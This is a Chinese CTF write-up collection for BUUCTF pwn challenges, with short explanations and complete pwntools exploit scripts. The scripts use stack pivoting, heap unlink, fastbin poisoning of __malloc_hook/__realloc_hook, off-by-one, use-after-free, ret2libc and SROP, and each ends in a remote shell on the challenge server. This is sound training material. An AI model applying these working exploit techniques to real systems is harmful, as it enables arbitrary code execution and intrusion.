BUUCTF-pwn(9)
gyctf_2020_borrowstack
使用栈迁移,将rsp迁移到bss段上,而bss段上处于可控位置。但是注意bss段低处处于不可写状态,如果rsp移动到该处,则程序无法进行下去!
尝试使用system函数,但是往往会涉及到bss段低处地址,而one_gadget则不需要过多占用栈地址,故采用one_gadget获取权限!
from pwn import *
from LibcSearcher import LibcSearcher
context(log_level='debug',os='linux',arch='amd64')
binary = './gyctf_2020_borrowstack'
r = remote('node4.buuoj.cn',26622)
#r = process(binary)
elf = ELF(binary)
start_addr = 0x0400530
main = elf.symbols['main']
bss_addr = 0x0601080
leave_ret = 0x0400699
ret = 0x04004c9
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi_ret = 0x0400703
pop_rsi_r15_ret = 0x0400701
#gdb.attach(r)
r.recvuntil("Welcome to Stack bank,Tell me what you want\n")
payload = b'a'*0x60+p64(bss_addr+0xa0)+p64(leave_ret)
r.send(payload)
r.recvuntil("Done!You can check and use your borrow stack now!\n")
payload2 = b'a'*0xa0+p64(bss_addr+0xf0)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main)#p64(0x0400680)
r.sendline(payload2)
puts_addr = u64(r.recv(6).ljust(8,b'\x00'))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr-libc.dump('puts')
system = libc_base+libc.dump('system')
sh = libc_base+libc.dump('str_bin_sh')
one = libc_base+0x4526a
log.info("puts_addr -> "+hex(puts_addr))
log.info("libc_base -> "+hex(libc_base))
log.info("system -> "+hex(system))
log.info("sh -> "+hex(sh))
'''payload3 = b'cccccccc'+p64(pop_rdi_ret)+p64(sh)+p64(pop_rsi_r15_ret)+p64(0)+p64(0)+p64(system)
payload3 = payload3.ljust(0x70,b'a')+p64(leave_ret)'''
r.recvuntil("Welcome to Stack bank,Tell me what you want\n")
'''payload3 = b'dddddddd'+p64(pop_rdi_ret)+p64(sh)+p64(system)
payload3 = payload3.ljust(0x60,b'e')+p64(0x6010e0)+p64(leave_ret)'''
payload3 = b'a'*0x68+p64(one)
r.sendline(payload3)
r.sendlineafter("Done!You can check and use your borrow stack now!\n",'')
r.interactive()
wustctf2020_closed
0ctf_2017_babyheap
分析主要函数!
首先开启了一块地址!
该函数杜绝了UAF以及double free的一般攻击手段!
此时我们便得到了一个堆溢出漏洞,如此便都简单起来了!
首先我们可以通过Unlink攻击,从而泄露出lmain_arena,进而计算出libc_base基地址,此时我们便可以得到one_gadget地址,此时我们利用堆溢出修改fastbin的fd指针内容,指向__malloc_hook,此时我们申请,便可以修改__malloc_hook为one_gadget了。
注: calloc与malloc的区别在于申请的chunk会将内容置零!同样的calloc也存在__malloc_hook,也会经历__int_malloc函数!
注意本地libc与远程版本的偏移量不同!
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './0ctf_2017_babyheap'
r = remote('node4.buuoj.cn',25922)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.23.so')
def Allocate(size=0x10):
r.sendlineafter("Command: ",'1')
r.sendlineafter("Size: ",str(size))
def Edit(index,size=0x10,payload=''):
r.sendlineafter("Command: ",'2')
r.sendlineafter("Index: ",str(index))
r.sendlineafter("Size: ",str(size))
r.sendafter("Content: ",payload)
def Free(index):
r.sendlineafter("Command: ",'3')
r.sendlineafter("Index: ",str(index))
def Show(index):
r.sendlineafter("Command: ",'4')
r.sendlineafter("Index: ",str(index))
def Exit():
r.sendlineafter("Command: ",'5')
Allocate()#0
Allocate(0x80)#1
Allocate()#2
Allocate(0x80)#3
Allocate(0x60)#4
Free(1)#1
payload = b'a'*0x10+p64(0xb0)+p64(0x90)
Edit(2,len(payload),payload)
Free(3)#3
Allocate(0x80)#1
Show(2)
r.recvuntil("Content: \n")
main_arena = u64(r.recv(6).ljust(8,b'\x00'))-88
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']#0x3C3B20
log.info("main_arena -> "+hex(main_arena))
log.info("libc_base -> "+hex(libc_base))
system = libc_base+0x45380
sh = libc_base+0x18C58B
one = libc_base+0x4526a
Allocate(0xa0)#3
Allocate(0x60)#5
Allocate(0x60)#6
Free(5)#5
payload2 = b'a'*0x68+p64(0x71)+p64(main_arena-0x33)
Edit(4,len(payload2),payload2)
Allocate(0x60)#5
Allocate(0x60)#7
payload3 = b'a'*0x13+p64(one)
Edit(7,len(payload3),payload3)
#gdb.attach(r)
Allocate()
r.interactive()
roarctf_2019_easy_pwn(realloc_hook控制栈结构达成onegadget)
分析主要函数
此时我们发现了位于checkSize函数中的一个off by one漏洞,可以修改下一块的标志位,此时我们便可以使用Unlink的攻击手法了!
此时我们首先可以通过Unlink来泄露处main_arena,进而泄露处liba_base基地址!此时我们便开始考虑攻击手法了。
可以申请一块0x60大小的chunk,通过上面的Unlink可以修改fastbin的fd指针内容(改为main_arena-0x33),此时我们便可以往__malloc_hook上面写入内容了。
注: one_gadget四个都无法实现攻击,故我们可以采取中间手段进行攻击!修改__malloc_hook为realloc函数,而realloc函数同样有__realloc_hook钩子函数,且位于__malloc_hook附近,故我们可以修改__realloc_hook为one,调整realloc初始push来调整esp位置,进而使one_gadget达到具有攻击效果!
实际为malloc–>__malloc_hook–>realloc+0x2–>__realloc_hook–>one_gadget
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './roarctf_2019_easy_pwn'
r = remote('node4.buuoj.cn',29812)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.23.so')
def Allocate(size=0x18):
r.sendlineafter("choice: ",'1')
r.sendlineafter("size: ",str(size))
def Edit(index,size=0x18,payload=''):
r.sendlineafter("choice: ",'2')
r.sendlineafter("index: ",str(index))
r.sendlineafter("size: ",str(size))
r.sendafter("content: ",payload)
def Free(index):
r.sendlineafter("choice: ",'3')
r.sendlineafter("index: ",str(index))
def Show(index):
r.sendlineafter("choice: ",'4')
r.sendlineafter("index: ",str(index))
def Exit():
r.sendlineafter("choice: ",'5')
Allocate()#0
Allocate(0x80)#1
Allocate()#2
Allocate(0x80)#3
Allocate()#4
Free(1)#1
Edit(2,0x18+10,b'a'*0x10+p64(0xb0)+p8(0x90))
Free(3)#3
Allocate(0x80)#1
Show(2)
r.recvuntil("content: ")
main_arena = u64(r.recv(6).ljust(8,b'\x00'))-88
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']#-0x3C3B20
realloc = libc_base+libc.symbols['realloc']#+0x3E2F30
one = libc_base+0x4526a#0x45206 0x4525a 0xef9f4 0xf0897
log.info("main_arena -> "+hex(main_arena))
log.info("libc_base -> "+hex(libc_base))
Allocate(0x60)#3
Free(3)#3
Edit(2,0x10,p64(main_arena-0x33)*2)
Allocate(0x60)#3
Allocate(0x60)#5
Edit(5,0x1b,b'a'*0xb+p64(one)+p64(realloc+2))
Allocate()
#r.sendline("ls")
#gdb.attach(r)
r.interactive()
hitcontraining_heapcreator
该题为off by one漏洞。
在Edit函数中存在read多读入一个字节,可以修改size大小,达到利用!
此时我们可以利用unsorted bin的特性泄露处main_arena,从而计算出libc_base基地址。同时我们可以修改size,进行Free并再次申请,此时我们便可以往再次申请的chunk中内部所存在的chunk进行写入内容了。
脚本较为复杂,泄露可以省略,因第二步时也达成了泄露地址的效果!故脚本可以进行简化,此处不再简化了。
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './heapcreator'
r = remote('node4.buuoj.cn',27600)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.23.so')
free_got = elf.got['free']
def Allocate(size=0x18,payload=''):
r.sendlineafter("Your choice :",'1')
r.sendlineafter("Size of Heap : ",str(size))
r.sendlineafter("Content of heap:",payload)
def Edit(index,payload=''):
r.sendlineafter("Your choice :",'2')
r.sendlineafter("Index :",str(index))
r.sendlineafter("Content of heap : ",payload)
def Show(index):
r.sendlineafter("Your choice :",'3')
r.sendlineafter("Index :",str(index))
def Free(index):
r.sendlineafter("Your choice :",'4')
r.sendlineafter("Index :",str(index))
def Exit():
r.sendlineafter("Your choice :",'5')
Allocate()#0
Allocate(0x80)#1
Allocate()#2
Free(1)#1
Allocate(0x10,b'a'*0x7)#1
Show(1)
r.recvuntil(b"aaaaaaa\n")
main_arena = u64(r.recv(6).ljust(8,b'\x00'))-216
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']#-0x3C3B20
system = libc_base+libc.symbols['system']#+0x45380
sh = libc_base+0x18cd57#+0x18C58B
log.info("main_arena -> "+hex(main_arena))
log.info("libc_base -> "+hex(libc_base))
Allocate()#3
Allocate()#4
Allocate()#5
Allocate()#6
Edit(3,b'a'*0x10+p64(0)+p8(0x91))
Free(4)#4
Allocate(0x80)#4
Edit(4,b'a'*0x20+p64(0)+p64(0x21)+p64(0x18)+p64(free_got))
Edit(2,p64(system))
Edit(4,b'a'*0x20+p64(0)+p64(0x21)+p64(0x18)+p64(sh))
Free(2)
#gdb.attach(r)
r.interactive()
hitcon2014_stkof
可以发现没有打印功能,但存在堆溢出漏洞!
此时我们可以使用Unlink,来修改bss段上的全局变量,此时我们便可以得到一个任意地址写,修改free_got为puts_plt,此时Free函数即为打印函数,故可以泄露出main_arena,此后我们计算出system函数地址,修改free_got地址为system函数地址,故此时free即为system函数,故我们写入chunk中"/bin/sh\x00",执行free(&chunk),既是执行system("/bin/sh\x00")!
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './stkof'
r = remote('node4.buuoj.cn',29349)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.23.so')
bss = 0x0602140
free_plt = elf.plt['free']
puts_plt = elf.plt['puts']
free_got = elf.got['free']
puts_got = elf.got['puts']
def Allocate(size=0x18):
r.sendline('1')
r.sendline(str(size))
def Edit(index,size=0x18,payload=b'a'*0x18):
r.sendline('2')
r.sendline(str(index))
r.sendline(str(size))
r.send(payload)
def Free(index):
r.sendline('3')
r.sendline(str(index))
Allocate()#1
Allocate(0x20)#2
Allocate(0x80)#3
Allocate()#4
target = bss+0x10
fd = target-0x18
bk = target-0x10
Edit(2,0x30,p64(0)+p64(0x21)+p64(fd)+p64(bk)+p64(0x20)+p64(0x90))
Free(3)#3
Allocate()#5
Edit(2,0x18,p64(0)*2+p64(free_got))
Edit(1,0x8,p64(puts_plt))
Free(5)
main_arena = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-248
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']#-0x3C3B20
system = libc_base+libc.symbols['system']#+0x45380
sh = libc_base+0x18C58B
log.info("main_arena -> "+hex(main_arena))
Edit(1,0x8,p64(system))
Edit(4,0x8,b'/bin/sh\x00')
Free(4)
#gdb.attach(r)
r.interactive()
ciscn_2019_s_9
该题较为简单!仅为ret2libc,但需要注意偏移量(动态调试得到正确的偏移量)
from pwn import *
from LibcSearcher import LibcSearcher
context(log_level='debug',os='linux',arch='i386')
binary = './ciscn_s_9'
r = remote('node4.buuoj.cn',25916)
#r = process(binary)
elf = ELF(binary)
#libc = ELF('./libc-2.27.so')
main = elf.symbols['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
ret = 0x08048342
#gdb.attach(r,'b *0x0804856A')
r.recvuntil(">\n")
payload = b'a'*(0x20+0x4)+p32(puts_plt)+p32(main)+p32(puts_got)
r.sendline(payload)
r.recvuntil("OK bye~\n")
puts_addr = u32(r.recv(4))
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr-libc.dump('puts')
system = libc_base+libc.dump('system')
sh = libc_base+libc.dump('str_bin_sh')
log.info("puts_addr -> "+hex(puts_got))
log.info("system -> "+hex(system))
log.info("sh -> "+hex(sh))
payload2 = b'a'*(0x24)+p32(system)+p32(sh)+p32(sh)
sleep(0.1)
r.sendline(payload2)
r.interactive()
pwnable_hacknote
该题为pwnable上原题!
经典UAF堆题目!
不过需要注意的是,我们一共可以申请5个chunk,即我们可以使用Allocate函数5次!
利用过程,便是通过修改程序所申请的chunk上的puts函数值为system函数,此时我们便可获取权限!
from pwn import *
context(log_level='debug',os='linux',arch='i386')
binary = './hacknote'
r = remote('node4.buuoj.cn',26887)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.23.so')
def Allocate(size=0x8,payload='\n'):
r.sendlineafter("Your choice :",'1')
r.sendlineafter("Note size :",str(size))
r.sendafter("Content :",payload)
def Free(index):
r.sendlineafter("Your choice :",'2')
r.sendlineafter("Index :",str(index))
def Show(index):
r.sendlineafter("Your choice :",'3')
r.sendlineafter("Index :",str(index))
def Exit():
r.sendlineafter("Your choice :",'4')
Allocate(0x40)#0
Allocate()#1
Free(0)
Allocate(0x30,b'aaaa')#2
Show(2)
r.recvuntil(b'aaaa')
main_arena = u32(r.recv(4))-112
libc_base = main_arena-0x20-libc.symbols['__memalign_hook']#-0x1B2780
system = libc_base+libc.symbols['system']#+0x3AD80
sh = libc_base+0x0015902b#+0x15BA3F
log.info("libc_base -> "+hex(libc_base))
log.info("system -> "+hex(system))
log.info("sh -> "+hex(sh))
Allocate(0x8,b'/bin/sh\x00')#3 sh
Free(3)#2
Free(2)#3
Allocate(0x8,p32(system)+b';sh\x00')#4
#gdb.attach(r)
Show(3)
r.interactive()
ciscn_2019_es_7
该题目为SROP利用!
我们利用sigreturn进行修改寄存器数值,然后返回到syscall,调用execve!
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './ciscn_2019_es_7'
r = remote('node4.buuoj.cn',27375)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.27.so')
pop_rdi_ret = 0x04005a3
sigreturn = 0x4004DA
syscall = 0x400517
vuln = 0x04004ED
payload = b'a'*0x10+p64(vuln)+b'b'*0x7+b'\n'
#gdb.attach(r)
r.send(payload)
r.recvuntil(b'bbbbbbb\n')
stack_addr = u64(r.recv(6).ljust(8,b'\x00'))-0x100-0x8
log.info("stack_addr -> "+hex(stack_addr))
sleep(0.1)
sig = SigreturnFrame()#未设置的默认为0
sig.rax = constants.SYS_execve
sig.rdi = stack_addr-0x10
sig.rip = syscall
payload2 = b'/bin/sh\x00'+b'd'*0x8+p64(sigreturn)+p64(syscall)+bytes(sig)
r.send(payload2)
r.interactive()